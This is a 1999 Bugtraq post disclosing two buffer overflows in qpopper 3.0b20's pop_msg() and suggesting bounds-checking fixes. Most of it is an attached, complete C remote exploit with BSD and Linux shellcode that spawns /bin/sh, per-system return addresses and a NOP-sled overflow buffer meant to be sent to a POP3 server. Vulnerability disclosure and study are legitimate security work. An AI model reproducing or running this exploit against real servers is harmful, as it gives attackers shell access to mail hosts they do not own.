
List:       bugtraq
Subject:    qpop3.0b20 and below - notes and exploit
From:       Lucid Solutions <lucid () TERRA ! NEBULA ! ORG>
Date:       1999-11-30 20:25:25

I found this overflow myself earlier this month.  Seems someone
else recently found it before Qualcomm was able to issue a patch. The 2.x
series is not vulnerable because AUTH is not yet supported and the error
returned by attempting to use AUTH does not call pop_msg() with any user
input.

There is also another overflow besides the AUTH overflow which can
occur if a valid username and password are first entered, also occurring in
pop_msg().
pop_get_subcommand.c contains this line near the bottom in qpopper3.0b20:
    pop_msg(p,POP_FAILURE,
            "Unknown command: \"%s %s\".",p->pop_command,p->pop_subcommand);

No bounds checking is done on the attempted subcommand.  It is
interesting to note that in qpop 2.53, a similar line is used, but with
limits on the string length!
    pop_msg(p,POP_FAILURE,
            "Unknown command: \"%.128s %.128s\".",p->pop_command,
            p->pop_subcommand);


I guess Qualcomm did not continue development of Qpopper directly from the
2.53 series, but rewrote code from scratch and/or based it on earlier
code.

As a solution, pop_msg() should also do bounds checking, and not make the
calling line responsible for it (although that's good practice too).
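As an added illustration (not qpopper's own code) of putting the bound inside the formatting routine: with the check in the function, the plain `%s` call site from 3.0b20 can no longer overrun the reply buffer. The names POP_MSG_MAX, safe_pop_msg and unknown_command_reply, the 256-byte buffer and the "-ERR" reply text are assumptions for this example.

```c
/* Added example, not qpopper's code: a pop_msg()-style reply formatter
 * that bounds-checks inside the function, as the post recommends.
 * POP_MSG_MAX, safe_pop_msg and unknown_command_reply are hypothetical. */
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

#define POP_MSG_MAX 256   /* assumed size of the server's reply buffer */

/* Format a reply into out[outsz].  vsnprintf never writes more than outsz
 * bytes and always NUL-terminates, so an over-long %s argument is cut off
 * instead of overrunning the buffer, whatever the format string says.
 * Returns the reply length, or -1 if the reply had to be truncated (so the
 * caller can log the oversized input). */
int safe_pop_msg(char *out, size_t outsz, const char *fmt, ...)
{
    va_list ap;
    int n;
    va_start(ap, fmt);
    n = vsnprintf(out, outsz, fmt, ap);
    va_end(ap);
    return (n < 0 || (size_t)n >= outsz) ? -1 : n;
}

/* The "Unknown command" reply from pop_get_subcommand.c, written with the
 * unbounded %s of 3.0b20: safe here because the bound lives in safe_pop_msg.
 * The "-ERR" prefix is constructed for this example. */
int unknown_command_reply(char *out, size_t outsz,
                          const char *command, const char *subcommand)
{
    return safe_pop_msg(out, outsz, "-ERR Unknown command: \"%s %s\".",
                        command, subcommand);
}

int main(void)
{
    char reply[POP_MSG_MAX];
    char longsub[2000];   /* constructed over-long sub-command */

    memset(longsub, 'A', sizeof longsub - 1);
    longsub[sizeof longsub - 1] = '\0';

    printf("%d %s\n", unknown_command_reply(reply, sizeof reply, "AUTH", "X"), reply);
    printf("%d (reply truncated to %zu bytes)\n",
           unknown_command_reply(reply, sizeof reply, "AUTH", longsub),
           strlen(reply));
    return 0;
}
```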

Attached is my original exploit that works on *BSD and Linux.  (Solaris is
NOT vulnerable to the AUTH overflow).  Slight modification is needed on
one line as the comments say.  This exploit will actually work on the
majority of machines then.  Qualcomm: you have already received my working
exploit with no modification needed.

Let's hope for an official patch soon.


						- sk8@lucid-solutions.com
						http://www.lucid-solutions.com

["q3combo-public.c" (TEXT/PLAIN)]

/* QPOP version 3.0b20 and lower beta versions REMOTE EXPLOIT
 * combination *BSD and Linux
 *
 * sk8@lucid-solutions.com
 * http://www.lucid-solutions.com
 *
 * I have written this to test and demonstrate vulnerabilities on clients' 
 * systems only.  
 *
 * !!!!!!!!!!DO NOT distribute!!!!!!!!!!
 * (at least not until Qualcomm issues a patch)
 * 
 * You may only use this to test your own system(s).
 * I am not responsible for any unauthorized use of this program.
 *
 * tested on BSDI 3.0/4.0.1, FreeBSD 2.2.8/3.3, Linux 
 * 
 * Since popper is usually compiled by the admin, return addresses will vary,
 * but I have included common values.  You may have to provide an offset
 * to get it to work on your system.
 * 
 * I wrote the exploit near the beginning of November 1999, and unlike some 
 * other exploits I've seen since, this one works even on Linux boxes on which 
 * inetd was not started from a shell prompt.
 *
 * One minor change must be made for this to exploit the AUTH overflow.
 *
 * Usage: If you can't figure out how to use this, you shouldn't
 * 	  be in the security business.  (try netcat)
 */

#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>  /* strstr, memset, memcpy, strlen */

unsigned int NOP=0x90;

unsigned long offset=0; /* default offset */

char bsdsc[]=
	"\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17"
	"\x88\x5e\x1c\x8d\x1e\x89\x5e\x0e\x31\xc0\xb0\x3b\x8d\x7e"
	"\x0e\x89\xfa\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89"
	"\xcf\xeb\x01\xff\x62\x61\x63\x60\xeb\x1b\xe8\xc9\xff\xff"
	"\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb"
	"\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa";

char linuxsc[]=
	"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
	"\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
	"\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
	"\xff\xff/bin/sh";

struct version {
	int num;
	char* systype;
	int buffer_length;
	long address;
};

struct version verlist[] = {
	{0, "BSDI 2.x/3.x, FreeBSD 2.x", 1001, 0xefbfd56c},
	{1, "BSDI 4.x", 1001, 0x8047564},
	{2, "FreeBSD 3.x", 1001, 0xbfbfd3dc},
	{3, "Linux", 990, 0xbfffd304},
	{0, 0, 0, 0}
};

int main(int argc, char** argv) {
	char* buffer, *shellcode;
	int buflen, i=0, ver, retaddr, align=0;
	struct sockaddr_in sockaddr;
	struct hostent* host;

	if (argc < 2) {
		printf("Usage: %s version [offset]\n", argv[0]);
		i=-1;
		printf("\nAvailable versions:\n");
		while (verlist[++i].systype)  {
		  printf("   %d: %s\n", verlist[i].num, verlist[i].systype);
		}
		printf("\n");
		exit(-1);
	}

	ver=atoi(argv[1]);
	if (argc > 2) {
		offset=atoi(argv[2]);
	}
	if (strstr(verlist[ver].systype, "Linux")) {
		shellcode=linuxsc;
		align=2;
	}
	else shellcode=bsdsc;

	buflen=verlist[ver].buffer_length;
	retaddr=verlist[ver].address;

	buffer=(char*)malloc(buflen);
	memset(buffer, NOP, buflen); 
	memcpy(buffer, "AUTH ", 4);
	memcpy(buffer+800, shellcode, strlen(shellcode));
	for (i=800+strlen(shellcode)+align; i< buflen-4; i+=4) {
		*((unsigned long int *)&buffer[i])=retaddr+offset;
	}
	buffer[buflen-2]='\n';
	buffer[buflen-1]='\n';

	printf("%s\n", buffer);
}

